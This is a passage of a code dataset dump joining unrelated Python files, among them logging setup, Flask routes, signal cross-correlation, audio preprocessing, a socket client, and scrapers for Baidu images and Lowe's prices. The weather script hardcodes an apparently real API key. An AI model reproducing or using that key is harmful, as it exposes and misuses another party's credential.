'where': '%(module)s.%(funcName)s',\n 'type': '%(levelname)s',\n 'stack_trace': '%(exc_text)s'\n}\n\n# sets level of logging\nlogging.basicConfig(level=LOGGING_LEVEL)\n\n# ! ! ! used to Import ! ! 
!\n# gets logger from logging module.\nLOG = logging.getLogger('foo')\n\n# gets handler\nMY_HANDLER = handler.FluentHandler('app.follow', host=HOST, port=PORT)\n\n# gets formatter with custom format\nFORMATTER = handler.FluentRecordFormatter(CUSTOM_FORMAT)\n\n# sets format for Fluentd handler\nMY_HANDLER.setFormatter(FORMATTER)\n\n# adds handler for logging\nLOG.addHandler(MY_HANDLER)\n","sub_path":"general_helper/logger/log_config.py","file_name":"log_config.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"213884484","text":"#coding: utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef func(x):\n y=3*x**2-1\n return y\n\nxmin=-2\nxmax=2\nnum=100\n\nx=np.linspace(xmin,xmax,num) # create num evenly spaced points between xmin and xmax\ny=func(x)\n\nplt.plot(x,y)\nplt.grid()\nplt.show()\n","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"204596605","text":"from flask import Blueprint\nfrom flask_restful import Api\n\nfrom resources.cash_flow.cash_flow_api import (\n MonthlyInflowOutflow,\n MonthlyCumInflowOutflowBalance,\n MonthlyBalance,\n RevenueExpenseKpi,\n ClintWiseInflowPercent,\n HeadWiseOutflowPercent,\n MonthlyTopkRevenue,\n MonthlyTopkExpense,\n MonthlyForcast,\n HistAndPredWeeklyData,\n CustomerMonthlyRevenue,\n AnnulQuarterMonthWeekRevenue,\n UploadDataFile,\n ProcessCashFlowFiles,\n CleanUpClientData\n )\n\n\ncash_flow_bp = Blueprint('cash_flow_api', __name__)\ncash_flow_api = Api(cash_flow_bp)\n\ncash_flow_api.add_resource(MonthlyInflowOutflow,'/cash_flow/monthly_inflow_outflow/')\ncash_flow_api.add_resource(MonthlyCumInflowOutflowBalance,'/cash_flow/cum_inflow_outflow_balance/') \ncash_flow_api.add_resource(MonthlyBalance, '/cash_flow/monthly_cash_balance/' )\ncash_flow_api.add_resource(RevenueExpenseKpi, '/cash_flow/revenue_expense_kpi/' )\n\ncash_flow_api.add_resource(ClintWiseInflowPercent, '/cash_flow/clientwise_inflow/')\ncash_flow_api.add_resource(HeadWiseOutflowPercent, '/cash_flow/deffent_headwise_outflow/')\ncash_flow_api.add_resource(MonthlyTopkRevenue, '/cash_flow/monthly_topk_revenue/')\ncash_flow_api.add_resource(MonthlyTopkExpense, '/cash_flow/monthly_topk_expense/')\n\ncash_flow_api.add_resource(MonthlyForcast, '/cash_flow/monthly_cash_blance_forecast/')\ncash_flow_api.add_resource(HistAndPredWeeklyData, '/cash_flow/weekly_hist_pred_data/')\n\ncash_flow_api.add_resource(CustomerMonthlyRevenue, '/cash_flow/customer_monthly_revenue/')\n\ncash_flow_api.add_resource(AnnulQuarterMonthWeekRevenue, '/cash_flow/interactive_time_sereis/')\n\ncash_flow_api.add_resource(UploadDataFile, '/cash_flow/upload_data_file/')\ncash_flow_api.add_resource(ProcessCashFlowFiles, '/cash_flow/process_data_file/')\ncash_flow_api.add_resource(CleanUpClientData, '/cash_flow/delete_client_data/')","sub_path":"AAP/source/code/blue_prints/cash_flow.py","file_name":"cash_flow.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"199213607","text":"# Dependencies\nimport requests\nimport json\n\n# Weather\napi_key = \"c7f9f57b4779391ea1f5ae067591c971\"\n\n# Endpoint URL for five day forecast Phoenix, AZ\ntarget_url = \"http://api.openweathermap.org/data/2.5/forecast\" \\\n \"?q=Phoenix,us&units=IMPERIAL&mode=json&APPID=\" + api_key\n\n# Print URL\nprint(target_url)\n\n# Request 
Data\ncity_weather = requests.get(target_url).json()\n\n# Display the weather with dates\nfor temp in city_weather[\"list\"]:\n print(\"%s | %s F\" % (temp[\"dt_txt\"], temp[\"main\"][\"temp\"]))\n","sub_path":"06-API/3/Activities/01-Stu_Wrapper_Recap/Solved/WeatherForecast.py","file_name":"WeatherForecast.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115684126","text":"import numpy as np\n\ndef calculate_correlation(list1, list2):\n \"\"\" calculates a cross correlation between two lists (list1, list2),\n to find out the time lag between disturbance and response by the\n pilot. The lists contain timeseries of the respective variable,\n not an averaged or absolute value!\n\n Args:\n list1: a list of aircraft behaviour data (either GS or LOC)\n --> glideslope deviation\n --> loc deviation\n list2: a list of pilot response data\n --> control wheel input\n --> control column input\n --> thrust input\n \n The following combinations shall be calculated:\n 1. glideslope deviation (list1) vs thrust input (list2)\n 2. glideslope deviation (list1) vs column input (list2)\n 3. localizer deviation (list1) vs wheel input (list2)\n\n Returns:\n time_difference: the time difference between disturbance and\n response. 'nan' is returned when the result disagrees with the\n control computation (arguments swapped), or when the reaction\n time falls outside the plausible 1-10 s window.\n\n Raises:\n None. \n \"\"\"\n # cross-correlation between disturbance and response (numpy)\n correlation = np.correlate(list1, list2, \"full\")\n correlation_verify = np.correlate(list2, list1, \"full\")\n # max value in each correlation array\n correlation_maximum = max(np.abs(correlation))\n correlation_maximum_verify = max(np.abs(correlation_verify))\n\n correlation_absolute = np.absolute(correlation)\n correlation_absolute_verify = np.absolute(correlation_verify)\n \n # time_difference: actual time difference between both signals\n # time_difference_verify: same computation with the arguments swapped,\n # used as a control: |time_difference_verify| should equal time_difference.\n time_difference = calculate_delay(correlation_absolute, \n correlation_maximum)\n time_difference_verify = calculate_delay(correlation_absolute_verify, \n correlation_maximum_verify)\n \n # a reaction time below 1 sec is considered unrealistic at this point\n if time_difference <= 1:\n return(float('NaN'))\n \n # leave some tolerance between control and actual value\n if time_difference - abs(time_difference_verify) < -4:\n return(float('NaN'))\n \n # a time difference greater than 10 secs carries no relevant information,\n # as the pilot must have reacted to the disturbance before then\n if time_difference > 10:\n return(float('NaN'))\n \n return time_difference\n\ndef calculate_delay(correlation_absolute, correlation_maximum):\n \"\"\" Calculates the time delay between two signals from the position of\n the correlation peak.\n\n
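    Example (illustrative): at a 1 Hz sampling rate,\n np.correlate([0, 1, 0, 0], [0, 0, 1, 0], \"full\") peaks one sample left\n of centre, so the recovered delay is -1 s, i.e. the second signal lags\n the first by one second.\n\n Args:\n correlation_absolute: list of the absolute correlation values\n correlation_maximum: maximum value of the 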
correlation_absolute list (the height of the correlation peak)\n\n Returns:\n time_difference: time difference of the signals in secs.\n Raises:\n None. If the computation fails, 'nan' is returned instead. \n \"\"\"\n # index of the correlation peak\n position = int(np.argmax(correlation_absolute))\n try:\n # Build the lag axis: a 'full' correlation of length L has zero lag at\n # its centre, so lags run from -(L-1)/2 for odd L (or -L/2 for even L).\n length = len(correlation_absolute)\n if length % 2 > 0:\n startvalue = ((length - 1) / 2) * (-1)\n else:\n startvalue = (length / 2) * (-1)\n lag = [startvalue + k for k in range(length)]\n # lag of the peak, in samples\n lag_difference = lag[position]\n \n # convert the lag to seconds, dependent on the sampling frequency\n # the frequency is assumed to be 1 Hz!\n frequency = 1\n time_difference = lag_difference/frequency\n return time_difference\n except BaseException:\n time_difference = float('NaN')\n return time_difference","sub_path":"fatigueEvaluation/preparations/calculateCrossCorrelation.py","file_name":"calculateCrossCorrelation.py","file_ext":"py","file_size_in_byte":5149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212397449","text":"# !/usr/bin/env python\r\n# _*_ coding:utf-8 _*_\r\n# author:AI悦创 2019/9/17 15:49\r\n\"\"\"\r\n# code is far away from bugs with the god animal protecting\r\n    I love animals. They taste delicious.\r\n    (ASCII-art mascot trimmed; its caption read: \"May the divine beast bless this code -- no bugs, ever!\")\r\n
\"\"\"\r\n# _._ encoding = utf-8 _._\r\nimport re # regex\r\nimport os # system\r\nimport time\r\nimport collections\r\nfrom collections import namedtuple\r\n\r\nimport requests\r\nfrom concurrent import futures\r\nfrom tqdm import tqdm\r\nfrom enum import Enum\r\n\r\n\r\nBASE_URL = 'https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord={keyword}&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=-1&z=&ic=&hd=&latest=&copyright=&word={keyword}&s=&se=&tab=&width=&height=&face=0&istype=2&qc=&nc=1&fr=&expermode=&force=&pn={page}&rn=30&gsm=&1568638554041='\r\n\r\nHEADERS = {\r\n\t'Referer': 'http://image.baidu.com/search/index?tn=baiduimage&ipn=r&ct=201326592&cl=2&lm=-1&st=-1&fr=&sf=1&fmq=1567133149621_R&pv=&ic=0&nc=1&z=0&hd=0&latest=0&copyright=0&se=1&showtab=0&fb=0&width=&height=&face=0&istype=2&ie=utf-8&sid=&word=%E5%A3%81%E7%BA%B8',\r\n\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\r\n\t'X-Requested-With': 'XMLHttpRequest', }\r\n\r\nclass BaiDuSpider:\r\n def __init__(self, max_works):\r\n self.max_works = max_works\r\n self.HTTPStatus = Enum('Status', ['ok', 'not_found', 'error'])\r\n self.result = namedtuple('Result', 'status data')\r\n self.session = requests.session()\r\n self.img_type = None\r\n self.img_num = None\r\n self.headers = HEADERS\r\n self.index = 1\r\n\r\n def get_img(self, img_url):\r\n res = self.session.get(img_url)\r\n if res.status_code != 200:\r\n res.raise_for_status()\r\n\r\n return res.content\r\n\r\n def download_one(self, img_url, verbose):\r\n try:\r\n image = self.get_img(img_url)\r\n except requests.exceptions.HTTPError as e:\r\n res = e.response\r\n if res.status_code == 404:\r\n status = self.HTTPStatus.not_found\r\n msg = 'not_found'\r\n else:\r\n raise\r\n else:\r\n self.save_img(self.img_type, image)\r\n status = self.HTTPStatus.ok\r\n msg = 'ok'\r\n\r\n if verbose:\r\n print(img_url, msg)\r\n\r\n return self.result(status, msg)\r\n\r\n def get_img_url(self):\r\n urls = [BASE_URL.format(keyword=self.img_type, page=page) for page in self.img_num]\r\n for url in urls:\r\n res = self.session.get(url, headers=self.headers)\r\n if res.status_code == 200:\r\n img_list = re.findall(r'\"thumbURL\":\"(.*?)\"', res.text)\r\n # yield the set of image URLs for the other methods to consume\r\n yield {img_url for img_url in img_list}\r\n elif res.status_code == 404:\r\n print('----- Request failed: resource not found -----')\r\n yield None\r\n elif res.status_code == 403:\r\n print('***** Request failed: the server refused access *****')\r\n yield None\r\n else:\r\n print('>>> Network connection failed <<<')\r\n yield None\r\n\r\n def download_many(self, img_url_set, verbose=False):\r\n if img_url_set:\r\n counter = collections.Counter()\r\n with futures.ThreadPoolExecutor(self.max_works) as executor:\r\n to_do_map = {}\r\n for img in img_url_set:\r\n future = executor.submit(self.download_one, img, verbose)\r\n to_do_map[future] = img\r\n done_iter = futures.as_completed(to_do_map)\r\n\r\n if not verbose:\r\n done_iter = tqdm(done_iter, total=len(img_url_set))\r\n for future in done_iter:\r\n try:\r\n res = future.result()\r\n except requests.exceptions.HTTPError as e:\r\n error_msg = 'HTTP error {res.status_code} - {res.reason}'\r\n error_msg = error_msg.format(res=e.response)\r\n except requests.exceptions.ConnectionError:\r\n error_msg = 'ConnectionError error'\r\n else:\r\n error_msg = ''\r\n status = res.status\r\n\r\n if error_msg:\r\n
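## Any exception recorded above downgrades this task's status, so the final\r\n ## Counter tallies ok / not_found / error across all futures (the classic\r\n ## submit-then-as_completed pattern that keeps tqdm's progress bar accurate).\r\n status = 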
self.HTTPStatus.error\r\n\r\n counter[status] += 1\r\n\r\n if verbose and error_msg:\r\n img = to_do_map[future]\r\n print('***Error for {} : {}'.format(img, error_msg))\r\n return counter\r\n else:\r\n pass\r\n\r\n def save_img(self, img_type, image):\r\n with open('{}/{}.jpg'.format(img_type, self.index), 'wb') as f:\r\n f.write(image)\r\n self.index += 1\r\n\r\n def what_want2download(self):\r\n self.img_type = input('Enter the type of image you want to download (anything works) >>> ')\r\n try:\r\n os.mkdir(self.img_type)\r\n except FileExistsError:\r\n pass\r\n img_num = input('Enter how many batches to download (one unit is 30 images, e.g. 1 downloads 30, 2 downloads 60): >>> ')\r\n while True:\r\n if img_num.isdigit():\r\n img_num = int(img_num)*30\r\n self.img_num = range(30, img_num+1, 30)\r\n break\r\n else:\r\n img_num = input('Invalid input, please re-enter the number to download >>> ')\r\n\r\n def main(self):\r\n # ask for the image type and the number of images to download\r\n total_counter = {}\r\n self.what_want2download()\r\n for img_url_set in self.get_img_url():\r\n if img_url_set:\r\n counter = self.download_many(img_url_set, False)\r\n for key in counter:\r\n if key in total_counter:\r\n total_counter[key] += counter[key]\r\n else:\r\n total_counter[key] = counter[key]\r\n\r\n else:\r\n # error reporting could be added here\r\n pass\r\n\r\n time.sleep(.5)\r\n return total_counter\r\n\r\n\r\nif __name__ == '__main__':\r\n max_works = 20\r\n bd_spider = BaiDuSpider(max_works)\r\n print(bd_spider.main())","sub_path":"Coder_Old/pycharm_daima/爬虫大师班/作业一/3.0版本/多线程版.py","file_name":"多线程版.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257048889","text":"from hexapod import Hexapod\nimport vrep\nimport time\nimport sys \nimport pickle\nimport numpy as np \n\nfrom tensorflow import keras\n\nfrom math import sin \nfrom gaft import GAEngine\nfrom gaft.components import BinaryIndividual, Population\nfrom gaft.operators import RouletteWheelSelection, UniformCrossover, FlipBitMutation\nfrom gaft.analysis import ConsoleOutput,fitness_store\n\n# Analysis plugin base class.\nfrom gaft.plugin_interfaces.analysis import OnTheFlyAnalysis\n\nindv_template = BinaryIndividual(ranges=[(-10,35),(40,60),(-40,-15),(15,50),(-70,-30),(0,20),(0.001,0.01)], eps=0.001)\npopulation = Population(indv_template=indv_template, size=16)\npopulation.init() # Initialize population with individuals.\n# with open('./backup-in-10.pickle','rb') as f:\n# population=pickle.load(f)\n\n# Use built-in operators here.\nselection = RouletteWheelSelection()\ncrossover = UniformCrossover(pc=0.8, pe=0.5)\nmutation = FlipBitMutation(pm=0.1)\n\nengine = GAEngine(population=population, selection=selection,\n crossover=crossover, mutation=mutation, analysis=[ConsoleOutput])\n\n\n@engine.fitness_register\ndef fitness(indv):\n rb.start_simulation()\n # time.sleep(0.5)\n rb.init()\n run_time=20000\n data=list(indv.solution)\n rb.set_step_data(stepData.gen_data([data[:2],data[2:4],data[4:6]]))\n # start_time=rb.get_time()\n\n\n\ndef connect(retry):\n while True:\n # vrep.simxFinish(-1) # close any previous connection\n clientId = vrep.simxStart(\n \"127.0.0.1\", 19997, True, True, 100, 5) # establish the connection to the server\n if clientId != -1: # connected successfully\n print('connect successfully')\n return clientId\n elif retry > 0:\n retry -= 1\n else:\n print('connect time out')\n sys.exit(1)\n time.sleep(1)\n\nclass Data(object):\n def __init__(self):\n self.model=[]\n pre=['./data/NN_ahead','./data/NN_middle','./data/NN_back']\n
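 # Load one pretrained Keras model per leg group (presumably front/middle/\n # rear, per the 'ahead'/'middle'/'back' file names); gen_data() samples each\n # network over a joint-angle range to build the hexapod's step tables.\n for i in range(3):\n 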
self.model.append(keras.models.load_model('{}.h5'.format(pre[i])))\n def gen_data(self,sample_range,sample_rate=50):\n self.data=[]\n for i in range(3):\n model=self.model[i]\n sampling_point=np.linspace(min(sample_range[i]),max(sample_range[i]),sample_rate)\n sampling_point=sampling_point.reshape(sampling_point.shape[0],1)\n predict=model.predict(sampling_point)\n sampling_point= np.around(sampling_point,decimals=1)\n predict= np.around(predict,decimals=1)\n result=np.concatenate([sampling_point,predict],axis=1)\n self.data.append(result)\n return self.data\n\n\n\nclient_id=connect(10)\nrb=Hexapod(client_id)\n\nstepData=Data()\n\nif __name__ == \"__main__\":\n engine.run(ng=50)\n","sub_path":"deprecated/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142832493","text":"import json\nimport requests\nfrom pyquery import PyQuery as pq\nimport urllib.error as error\nfrom urllib.parse import quote\nfrom urllib.request import (urlopen, Request)\nfrom core.settings import SCRAPER_API_KEY\n\nclass Competitor:\n def __init__(self, model_number, url):\n self.model_number = model_number\n self.url = url\n self.document_obj = None\n\n def search_product(self):\n if self.url:\n return(self.get_price())\n else:\n try:\n search_url = \"https://www.lowes.com/search?searchTerm=\"+self.model_number #lowe's\n code = self.set_response(search_url)\n if code:\n return code, False\n else:\n return(self.get_lowes_url())\n \n except Exception as e:\n print('Lows search Exception', e)\n return False, False\n\n def set_response(self, url):\n headers = {'User-Agent': 'pyquery'}\n cookies= {'intl_splash': 'false'}\n try:\n request = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(url), headers=headers)\n response_body = urlopen(request).read()\n self.document_obj = pq(response_body)\n except error.HTTPError as e:\n print('LOWES Response Exception', e)\n return e.code\n \n\n def get_lowes_url(self):\n try:\n if self.document_obj :\n link = self.document_obj('link').filter(lambda rel : pq(this).attr('rel') == 'canonical')\n product_url = link.attr('href') if link else False\n if product_url:\n prod_url_data = product_url.split('/')\n prod_id = prod_url_data[len(prod_url_data)-1]\n prod_id = prod_id.split('?')[0]\n price = self.get_price_url(prod_id) if prod_id else False\n else:\n price = False\n return product_url, price\n else :\n return False, False\n \n except Exception as e:\n print('LOWES Exception', e)\n\n \n def get_price_url(self, prod_id):\n \n st_url = 'https://www.lowes.com/wcs/resources/store/10151/storelocation/v1_0?maxResults=1&query=0477'\n headers = {'Accept': 'application/json'}\n \n try:\n st_req = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(st_url), headers=headers)\n response = urlopen(st_req).read()\n res = pq(response).text()\n store_number = json.loads(res)['storeLocation'][0]['storeNumber']\n\n if response == float(0):\n return False\n \n price_url = 'https://www.lowes.com/PricingServices/price/balance?productId=%s&storeNumber=%s'%(prod_id, store_number if response else '0477')\n price_req = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(price_url), headers=headers)\n price_res = urlopen(price_req).read()\n response_body = pq(price_res).text()\n \n except error.HTTPError:\n print('lows price Exception ', error.HTTPError)\n return False\n return 
float(json.loads(response_body)[0]['price']['selling'])\n\n\n \n def get_price(self):\n \n st_url = 'https://www.lowes.com/wcs/resources/store/10151/storelocation/v1_0?maxResults=1&query=0477'\n headers = {'Accept': 'application/json'}\n \n try:\n prod_id = self.url.split('/')\n prod_id = prod_id[len(prod_id)-1]\n if '?' in prod_id:\n prod_id = prod_id.split('?')[0]\n\n st_req = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(st_url), headers=headers)\n response = urlopen(st_req).read()\n store_number = json.loads(response)['storeLocation'][0]['storeNumber']\n # response = json.loads(requests.get(st_url).content) if requests.get(st_url).content is not None else float(0)\n if response == float(0):\n return False, False\n # price_url = 'https://www.lowes.com/PricingServices/price/balance?productId=%s&storeNumber=%s'%(prod_id, response['storeLocation'][0]['storeNumber'] if response else '0477')\n price_url = 'https://www.lowes.com/PricingServices/price/balance?productId=%s&storeNumber=%s'%(prod_id, store_number if response else '0477')\n price_response = requests.get(price_url)\n \n request = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(price_url), headers=headers)\n response_body = urlopen(request).read()\n \n except error.HTTPError:\n print('lows Exception >>>>>>>>>>>>>>>>>>>>>>>', error.HTTPError)\n return False, False\n if price_response.status_code == 400:\n return False, False\n # return float(price_response.json()[0]['price']['selling'])\n return self.url, float(json.loads(response_body)[0]['price']['selling'])\n\n\n","sub_path":"src/competitor/scrappers/lows.py","file_name":"lows.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125370194","text":"#\r\n# [893] All Nodes Distance K in Binary Tree\r\n#\r\n# https://leetcode.com/problems/all-nodes-distance-k-in-binary-tree/description/\r\n#\r\n# algorithms\r\n# Medium (41.04%)\r\n# Total Accepted: 6.5K\r\n# Total Submissions: 15.7K\r\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n2'\r\n#\r\n# We are given a binary tree (with root node root), a target node, and an\r\n# integer value K.\r\n#\r\n# Return a list of the values of all nodes that have a distance K from the\r\n# target node.  
The answer can be returned in any order.\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# Example 1:\r\n#\r\n#\r\n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], target = 5, K = 2\r\n#\r\n# Output: [7,4,1]\r\n#\r\n# Explanation:\r\n# The nodes that are a distance 2 from the target node (with value 5)\r\n# have values 7, 4, and 1.\r\n#\r\n#\r\n#\r\n# Note that the inputs \"root\" and \"target\" are actually TreeNodes.\r\n# The descriptions of the inputs above are just serializations of these\r\n# objects.\r\n#\r\n#\r\n#\r\n#\r\n# Note:\r\n#\r\n#\r\n# The given tree is non-empty.\r\n# Each node in the tree has unique values 0 <= node.val <= 500.\r\n# The target node is a node in the tree.\r\n# 0 <= K <= 1000.\r\n#\r\n#\r\n#\r\n#\r\n# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\n\r\nclass Solution:\r\n def __init__(self):\r\n self.parents = {}\r\n\r\n def dfs(self, cur, parent):\r\n if not cur:\r\n return\r\n self.parents[cur] = parent\r\n if cur.left:\r\n self.dfs(cur.left, cur)\r\n if cur.right:\r\n self.dfs(cur.right, cur)\r\n\r\n def distanceK(self, root, target, K):\r\n \"\"\"\r\n :type root: TreeNode\r\n :type target: TreeNode\r\n :type K: int\r\n :rtype: List[int]\r\n \"\"\"\r\n if not root or not target:\r\n return []\r\n if K == 0:\r\n return [target.val]\r\n res = []\r\n # first add parent link and convert the tree into graph\r\n self.dfs(root, None)\r\n curLevel = 0\r\n q = [target]\r\n visited = {target}\r\n # then use BFS to get the needed distance\r\n while curLevel < K:\r\n curLen = len(q)\r\n for i in range(curLen):\r\n curNode = q[i]\r\n for newNode in (curNode.left, curNode.right,\r\n self.parents[curNode]):\r\n if newNode and newNode not in visited:\r\n visited.add(newNode)\r\n q.append(newNode)\r\n q = q[curLen:]\r\n curLevel += 1\r\n res = list(map(lambda x: x.val, q))\r\n return res\r\n\r\n\r\ndef main():\r\n target = root = TreeNode(0)\r\n root.right = TreeNode(1)\r\n root.right.right = TreeNode(2)\r\n root.right.right.right = TreeNode(3)\r\n\r\n print(Solution().distanceK(root, target, 2))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Medium/863.all-nodes-distance-k-in-binary-tree.python3.py","file_name":"863.all-nodes-distance-k-in-binary-tree.python3.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"560938688","text":"import librosa\r\nfrom tqdm import tqdm\r\nfrom keras.utils import np_utils\r\nimport numpy as np\r\nimport os\r\ndest=os.listdir('dataset')\r\nlabel=[]\r\nfeature=[]\r\n#print(label)\r\n\r\nfor i in (range(len(dest))):\r\n try:\r\n fi='dataset/'+dest[i]\r\n print(fi)\r\n data,rate=librosa.load(fi)\r\n data=data[len(data)-5000:len(data)]\r\n #print(rate)\r\n mfcc=librosa.feature.mfcc(y=data,sr=rate,n_mfcc=5)\r\n print(mfcc.shape)\r\n if(mfcc.shape==(5,10)):\r\n l=dest[i]\r\n print(1)\r\n label.append(int(l[0]))\r\n print(2)\r\n feature.append(mfcc)\r\n print(3)\r\n #print(label) \r\n except:\r\n print('File not 
found')\r\n\r\n#print(len(train))\r\n#print(len(label))\r\n#label=np.array(label)\r\nlabel=np_utils.to_categorical(label,10)\r\nfeature=np.array(feature)\r\ntrain_label,test_label=label[0:1920],label[1920:2400]\r\ntrain_feature,test_feature=feature[0:1920],feature[1920:2400]\r\n\r\nnp.save('array/train_label',train_label)\r\nnp.save('array/test_label',test_label)\r\nnp.save('array/train_feature',train_feature)\r\nnp.save('array/test_feature',test_feature)\r\n\r\n","sub_path":"codes/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428716614","text":"import socket\nimport numpy as np\nfrom socket import AF_INET, SOCK_STREAM\nimport cv2\n\nclient = socket.socket(AF_INET, SOCK_STREAM)\nclient.connect(('localhost', 9899)) # tuple\n\nwhile True:\n\n data = client.recv(1024)\n\n size = int(data.decode()) # decode는 스트링에서 바이트\n print(\"image size\")\n print(size)\n\n client.sendall(\"ok\".encode())\n\n image_data = b''\n while size > 0:\n print(size)\n image_data += client.recv(1024)\n size -= 1024\n\n client.sendall(\"b\".encode())\n\n nparr = np.fromstring(image_data, np.uint8)\n image = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n cv2.imshow('image.jpeg', image)\n\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n","sub_path":"MyProject/tutoring/exc - 복사본/net/video_client.py","file_name":"video_client.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125122025","text":"\nimport unpickle as up\nimport numpy as np\nfrom keras.utils import np_utils\nfrom dat_extract.extract.Ship_Variable_Extraction import Ship\nimport random\n\ndef get_data(folder):\n ships = up.unpickle_ships(folder)\n random.shuffle(ships)\n train_data_size = 5*(len(ships)/6)\n test_data_size = len(ships)/6\n train_spect = []\n test_spect = []\n \n train_speeds = []\n test_speeds = []\n speeds_categories = []\n \n i = 0\n while len(train_spect) self.surface.get_width() + DESTROY_TOLERANCE) or\\\r\n (self.y < -DESTROY_TOLERANCE or self.y > self.surface.get_height()+DESTROY_TOLERANCE):\r\n return True\r\n else: \r\n return False\r\n\r\n \r\n def check_collision(self, shot):\r\n if shot.x - self.size < self.x < shot.x + self.size and shot.y - self.size < self.y < shot.y + self.size:\r\n return True\r\n else:\r\n return False\r\n \r\n def take_damage(self):\r\n self.size -= Property.get('damage')\r\n\r\n ","sub_path":"Meteor.py","file_name":"Meteor.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153537473","text":"# importing all necissary libraries\nimport os as os\nimport sys as sys\n\n\ndef getArgs(n): #retrieves the given parameters from the command line and stores them in a list\n arg = []\n cnt = 0\n for argument in sys.argv:\n arg.append(sys.argv[cnt])\n cnt = cnt + 1\n return arg[n]\n\ndef getPath():\n path = getArgs(1) #retrieve the path argument\n if path != \"\":\n return path\n else:\n print(\"No path given! 
Please provide a path relative to this directory\")\n\ndef getFileNames(): #creates a list of all file names in the path directory\n fileList = []\n path = getPath()\n cnt = 0\n for file in os.listdir(str(path)):\n fileList.append(os.listdir(str(path))[cnt])\n cnt = cnt + 1\n return fileList\n\ndef createFunctionLists(file):\n path = getPath()\n functionList = []\n wordList = []\n cnt = 0\n func = \"function\"\n with open(path + '/' + file, 'r') as f:\n for line in f:\n for word in line.split():\n wordList.append(str(word))\n for word in wordList:\n cnt = cnt + 1\n if word == func:\n function = wordList[cnt]\n functionList.append(function)\n return functionList\n\ndef createDictionary():\n dictionary = {}\n fileList = getFileNames()\n for file in fileList:\n dictionary['%s' % file] = createFunctionLists(file)\n return dictionary\n\nprint(createDictionary())\n","sub_path":"jsFunctionFinder.py","file_name":"jsFunctionFinder.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"389905397","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nfrom sklearn.linear_model import LogisticRegression\nlista='lista_feats_si_no.txt'\nhf = open(lista,'r')\nlines=hf.readlines()\n#load all feats\nY=[]\nX=[]\nfor line in lines:\n hf = h5py.File(line[:-1], \"r\")\n feats = (hf.get('fbank')).value\n X.append(np.mean(feats,axis=0))\n lab=(hf.get('label')).value\n Y.append(lab)\n hf.close()\n \nX=np.array(X) \nY=np.array(Y)\n\n\n\n#calcular media\nmeanX=X.mean(axis=0)\nX=X-meanX\n#calcular matriz de covarianzas\nSigma=np.cov(X.transpose())\n\nu, s, vh = np.linalg.svd(Sigma, full_matrices=True)\nXp=np.dot(X,u)\nplt.figure(1)\nplt.plot(Xp[Y==0,0],Xp[Y==0,1],'ob')\nplt.plot(Xp[Y==1,0],Xp[Y==1,1],'or')\nplt.show()\n\n\n\n","sub_path":"examples_classify/example_pca_si_no.py","file_name":"example_pca_si_no.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88591603","text":"import re\nimport netaddr\n\nfrom virt.lib.core import exception\nfrom virt.lib.common.virtual_machine import BaseManager\nfrom virt.lib.common.network import test_network\nfrom virt.lib.windows.core import powershell\n\n\nclass PowerShellManager(BaseManager):\n @classmethod\n def create(\n cls, name, disk_file, vnic_list=None, cpu=1, memory=512, **kwargs):\n\n # Create a VM (new-vm)\n powershell.exec_powershell(\n 'new-vm', name=name, memorystartupbytes=str(memory) + \"MB\",\n vhdpath=disk_file)\n\n # Set CPU (set-vmprocessor)\n powershell.exec_powershell('set-vmprocessor', vmname=name, 